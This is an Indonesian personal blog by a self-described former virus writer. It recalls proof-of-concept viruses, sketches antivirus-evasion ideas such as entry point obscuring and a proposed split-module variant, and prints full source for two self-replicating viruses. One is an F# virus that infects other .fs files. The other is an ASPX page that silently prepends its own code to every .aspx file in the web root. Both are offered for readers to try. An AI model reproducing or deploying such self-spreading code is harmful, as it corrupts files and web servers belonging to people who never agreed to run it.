Fadly’s Research aNd DeVeLopmeNt aRea

Hampir 6 tahun saya menggeluti dunia para penulis virus, sejak saya berumur 17 tahun, saya mulai tertarik dengan teknik pemrograman ini, dimulai dari membuat Trojan memakai Delphi, lalu trus learn n learn ngoprak ngoprek sampai pernah saya ga tidur selama 2 hari penuh karena modul yang sedang saya garap tidak berjalan, sampai akhirnya di tawari masuk ke dalam RRLF ( http://rrlf.de.vu ) salah satu dari 2 group virus yang paling di sorot oleh KASPERSKY dan TREND MICRO pada saat itu, Banyak yang bertanya mengapa saya melakukan ini, dan alas an yang paling sering saya lontarkan adalah “ISENG”, yah memang awal dari semua ini Cuma keisengan, namun dampaknya menjadi besar didalam hidup saya, dimana setiap riset yang telah saya lakukan sewaktu masih aktif menulis virus menjadi solusi buat perusahaan tempat saya bekerja sekarang, dimana saya menjadi tahu design arsitektur dari suatu Operating System, dimana saya menjadi tahu tentang konsep TCP/IP, menjadi tahu metode kompilasi, dan masih banyak alas an lainnya.

Memang banyak sekali alas an seseorang membuat virus, mulai dari iseng, ingin terkenal, dendam, dan berton-ton alas an social lainnya, namun alasan2 sosial tersebut hanya dilontarkan oleh Newbies, Sedangkan pembuat virus dari golongan advanced adalah seorang hacker, dimana mereka akan membuktikan dan berlomba-lomba mencari lubang keamanan disetiap teknologi terbaru yang ada, saya akan beri contoh :

EPOC Caribe
Virus epoc pertama di dunia yang dibuat oleh ValleZ dari 29A, ValleZ membuatnya sekitar 3 bulan setelah peluncuran perdana Mobile Phone dengan OS Symbian

Winux
Sekitar tahun 99 dibuat oleh Benny/29a, dia membuat bungkam para pioneer linux yang mengklaim OS berbasis *NIX bebas dari virus

OO.Stardust
Virus Macro Open Office pertama yang dibuat oleh Necronomicon/RRLF

WinCE.Dust
Dirilis 29A hanya seminggu setelah mcrosoft meluncurkan WinCE Beta test

Win64.Rugrat
Sebulan setelah Intel Memproklamirkan Win64, Roy G Biv dari 29A meluncurkan Rugrat dan memberikan samplenya kepada Kaspersky, Virus Rugrat adalah virus Win64 pertama dimana masih terdapat error didalamnya, namun semua modul infeksi berjalan dengan baik.

Vista ICAD
Ini yang lebih gila, Second Part To hell, salah satu teman saya di RRLF, membuat virus yang berjalan di vista, padahal waktu itu Microsoft baru akan merilisnya 6 bulan kemudian.

VALIUM
Virus pertama yang berhasil menyebar lewat CD Room, dan menginfeksi file grafik, saya merilisnya 2 tahun lalu.

Dari Beberapa Contoh virus2 Proof of Concept tersebut, semua pembuat virus tersebut mempunyai alas an yang beragam mengapa mereka membuatnya, namun semuanya sepakat bahwa mereka membuatnya dengan alas an “To discover security holes in new field before badone do it”.Tidak seperti virus-virus local yang bersifat destructive, semua virus proof of concept sangat sederhana, tanpa payload, enkripsi, poly dll, namun semuanya menjadi acuan bagi pihak developer dan antivirus untuk menanggulanginya dengan cepat sebelum seseorang mengembangkannya lebih jauh lagi.

Saat ini saya sudah tidak aktif berexperimen, karena sekarang saya memang sangat sibuk dengan aplikasi-aplikasi database, udah sangat jarang sekali ngoprak ngaprek OS, bahkan sekarang computer dirumah saja sudah tidak pernah saya sentuh lagi keyboardnya. Yah beginilah nasib menjadi pekerja.

Sebenaranya konsep ini adalah pure ide, tanpa pembuktian yang konkrit, dan saya rasa ini memang cukup sulit untuk di realisasikan, namun, hal ini akan menjadi hal yang sangat berbahaya jika seseorang dapat membuktikan dan membawa konsep ini ke dunia pemrograman. Pernahkah anda mendengar tentang Polimorfisme, oligomorfisme atau metamorfisme dalam malicious software (malware/virus), ya memang teknik itu adalah teknik2 antidetection yang sering dipakai suatu virus computer, dimana setiap kali menginfeksi target, virus akan merubah dirinya sedemikian rupa, dengan maksud mengecoh teknik penditeksian dari antivirus yang masih memakai teknik diteksi “Hard Signature”. Namun akhir-akhir ini para pembuat virus lebih canggih lagi dengan menggabungkan konsep algoritma genetic dalam virusnya apa itu algoritma genetic ?, untuk lebih jelasnya lihat scenario sederhana yang saya buat ini :

“Natural selection” Itulah intri algoritma genetic, Sebelum menginfeksi virus akan mempelajari dulu target yang akan di Infeksi serta atmosfer dimana dia berada, lalu secara otomatis virus akan menghilangkan module2 yang sekiranya tidak berguna untuk dipakai, hal itu terus berlangsung sampai yang tersisa hanya inti dari program ( kebanyakan disebut Code DNA ).Dari sekian banyak teknik anti detection yang dipublikasikan tersebut, saya cenderung lebih tertarik kepada teknik Entry Point Obscuring / EPO, yang pertama kali diperkenalkan oleh GRIYO dari 29a Virus Group, teknik ini terlihat sederhana, namun sangat jenius menurut saya, lihat gambar berikut

Prinsip kerja :1. Virus membagi-bagi dirinya dalam beberapa modul
2. Sebelum menginfeksi virus akan merandom modul2 tersebut, sebelum di pisahkan untuk menginfeksi dengan teknik lapisan seperti gambar diatas
3. Virus juga mempunyai konstan parameter yang digunakan untuk mengurutkan modul2 yang akan bekerjaJika dilihat dari gambar diatas, maka banyaknya variant yang akan dihasilkan dari konsep EPO tersebut adalah :

Mod1,mod2,mod3,mod4,host,host,host,host -> 8!

= 8!
=8*7*6*5*4*3*2*1
= 40320 Variant virus

Dari sini saya mengembangkan kembali konsep dari griyo dimana saya mempunyai konsep sederhana yang saya berinama CROSS EPO dan mengklasifikasikannya menjadi bebearapa bagian.

CROSS EPO

Sebenarnya konsep dari cross EPO hampir sama dengan EP™O yang membedakan hanya, jika pada cross epo sendiri kita membagi modul2 tersebut menjadi 2 file yang berbeda, dimana suatu file tidak akan berfungsi tanpa menemukan pasangannya, saya memanggilnya yinyang module, disini saya membagi konsep ini dalam beberapa klasifikasi antara lain

MONOGENETIC CROSS EPO
HETERO GENETIC CROSS EPO
DUAL HETEROGENETIC CROSS EPO

MONOGENETIC CROSS EPO

HETERO GENETIC

DUAL HETERO GENETIC

Sangat rumit jika saya harus jelaskan satu persatu, namun jika pada DUAL HETERO GENETIC diatas jika kita dibuatkan rumus sederhana dimana virus dibagi menjadi 6 modul dan host juga dibagai 6 modul maka akan didapatkan rumus matematis sbb :Misal A : Modul virus, B : Modul host
Maka(A!/(A-6)!6! * B!/(B-0)!0!) + (A!/(A-5)!5! * B!/(B-1)!1!) + (A!/(A-4)!4! * B!/(B-2)!2!) + (A!/(A-3)!3! * B!/(B-3)!3!) + (A!/(A-2)!2! * B!/(B-4)!4!) + (A!/(A-1)!1! * B!/(B-5)!5!) +(A!/(A-0)!0! * B!/(B-6)!6!)= …Variant
?Maaf belum saya hitung, terakhir saya hitung memakai kalkulator di windows tidak dapat memuat semua hasilnya karena memang memory program kalkulator di windows juga terbatas.

Sekali lagi ini Cuma murni ide tanpa bukti konkrit, tapi apa salahnya kita waspada, jika suatu saat ada orang yang berhasil membuktikannya ? How this thing will gonna be ?, hehehe hueX

Mungkin jika ada orang asing yang menemukan judul ini di Internet akan kecewa
karena saya merilisnya memakai bahasa Indonesia tercinta, entah mengapa akhir-akhir
ini semangat nasionalisme saya tinggi sekali, hehehe mungkin karena sekarang saya
telah menjadi BLOGER kale hohohoh..

Microsoft Research Team said :

Combining the efficiency, scripting, strong typing and productivity of ML with the
stability, libraries, cross-language working and tools of .NET.
F# is a programming language that provides the much sought-after combination of
type safety, performance and scripting, with all the advantages of running on a
high-quality, well-supported modern runtime system

Now I said :

F# is a freak languange which developed by Microsoft Research Team, Having very bad structure, unfamiliar commands with poor documentation and stupid Error Handler.

Hohohoho Mudah2an saja saya tidak dipenjara karena teori diatas, tapi nyatanya memang
demikian, arsitektur F# sangat buruk menurut saya, sulit dipelajari dengan sangat amat
sedikit dokumentasi dari Internet, dan masih terdapat banyak bugs pada interpreternya

tapi dengan sedikit usaha dan kesabaran yang amat sangat sabar, akhirnya saya dapat
membuktikan bahwa F# juga bisa di simulasikan menjadi virus.

Apa Itu F# ?

F# (sebutnya F-Sharp) adalah suatu versi scripting dari variant Microsoft .NET based language
yang menurut saya adalah campuran dari C# dan OCaml programming language seperti CALM, mungkin juga LISP.
F# menurut saya sangat tidak bersahabat, karena saya akui memang jenis ini adalah variant baru dan sangat
sedikit sekali dokumentasinya di Internet,dan saya telah menghabiskan waktu hampir sebulan belajar F#
tapi itu bukan masalah, karena setidaknya saya menjadi lebih tau tentang F# dan saya telah membuktikan
bahwa F# pun bisa disimulasikan menjadi sebuah virus.

And this is the first(maybe) F# which able replicate and infect another F#

*****************************************************************
(* Mark *)
open System.IO
let vfile = new StreamReader(Sys.argv.(1));;
let vcode = (vfile.ReadToEnd()).Substring(0,526);;
let vclose = vfile.Close();;
let files = Directory.GetFiles(“.”,”*.fs”);; for i = 0 to files.Length-1 do
let hfile = new StreamReader(files.(i)) in
let hcode = hfile.ReadToEnd() in
let _ = hfile.Close() in
if (hcode.Substring(3,4)<>”Mark”) then begin
let hfile = new StreamWriter(files.(i)) in
let _ = hfile.Write(vcode+hcode) in
hfile.Close();
end
done
****************************************************************

1. Membuka System.IO bawaan .NET
2. Lalu membuka dan membaca bodi / kodenya sendiri
3. Mencari file *.fs lain di dalam direktori yang sama
4. Mengecek apa sudah terinfeksi sebelumnya
5. Jika belum Maka di Infeksi

Hohohohoh, Download F# disini

http://research.microsoft.com/projects/ilx/fsharp.aspx

Selamat mencoba…!!

Hohohohohooh
seiring dengan majunya teknologi microsoft maka makin maju
pula teknologi para coder hohohoh mungkin saya salah satunya wakwaw…
Lagi2 tentang pembuktian konsep atau sering disebut ”Proof Of concept” hehehe
I love that sentence, sounds cooL ya gag sih ??

Kemaren gua pusing banget ngerjain aplikasi pesenan

karena ke-MUMET-an gua kemaren akhirnya dateng lagi setan iseng di kepala gua.
gua nyoba2 apa bisa aspx replikasi ? soalnya pada ASp klasik gua dah nyoba dan ASP klasik ga begitu friendly buat replikasi, soalnya untuk baca
independendent path musti hardcode itupun  juga harus membuat sendiri path lewat file DLL, Ok kemaren dalam waktu lumayan singkat
yang gua inget dari jam 2 abis makan siang sampe jam 4-an gw coding tuh program  ASPX sejenis virus, dan akhirnya taraaaaa…… the first one ASPX virus maybe… hoho

—————————————————————————————–

<!– FADLY –>
<html>
<head>
<script language=”VB” runat=”server”>
Sub Page_Load (ByVal Sender As Object, ByVal E As EventArgs)
Try
Dim di As New System.IO.DirectoryInfo(“C:\Inetpub\wwwroot”)
Dim fiArr As System.IO.FileInfo() = di.GetFiles(“*.aspx”)
Dim fri As System.IO.FileInfo
Dim line, file_cont As String
Dim i,IsInf As Integer
Dim VirCode As String = “”
For Each fri In fiArr
Dim file_pointer As New System.IO.StreamReader(“C:\Inetpub\wwwroot\”+fri.Name)
Do
line = file_pointer.ReadLine()
file_cont=file_cont+line+Chr(13)+Chr(10)
Loop Until line Is Nothing
file_pointer.Close()
For i=0 to file_cont.Length-12
If file_cont.Substring(i, 12) = “<!”+”– FADLY –>” Then VirCode = file_cont.Substring(i-1, 1613)
Next
Next

For Each fri In fiArr
IsInf=0
file_cont=”"
Dim file_pointer As New System.IO.StreamReader(“C:\Inetpub\wwwroot\”+fri.Name)
Do
line = file_pointer.ReadLine()
file_cont=file_cont+line+Chr(13)+Chr(10)
Loop Until line Is Nothing

file_pointer.Close()

For i=0 to file_cont.Length-12
If file_cont.Substring(i, 12) = “<!”+”– FADLY –>” Then IsInf = 1
Next

If IsInf <> 1 Then
Dim file_pointerW As New System.IO.StreamWriter(“C:\Inetpub\wwwroot\”+fri.Name)
file_pointerW.WriteLine(VirCode+Chr(13)+Chr(10)+file_cont)
file_pointerW.Close()
i=file_cont.Length
End If
Next
Catch ex As Exception
End Try
End Sub

</script>
</head>
<body>
<p id=”ausgabe” runat=”server”></p>
</body>
</html>

—————————————————————————————–

Apaan tuh ??

Kode diatas adalah contoh dari aplikasi .NET aspx yang dapat mereplikasi dirinya sendiri ke file lain hohohoh mungkin orang nyebutnya virus, tapi tenang aja itupun prepender kok, no overwrite, jadi dia cuma numpang ( nitipin )  bodynya ke body file ASPX  lain hohohohoho….

Dan satu lagi, kode diatas cuma sebagai pembuktian konsep dan teori dari gw kalo ga ada satupun sistem yang 100% aman, yang saya lakukan hanya membantu microsoft untuk menutupi lubang-lubang tersebut.Ok terima kasih dan..

selamat mencoba.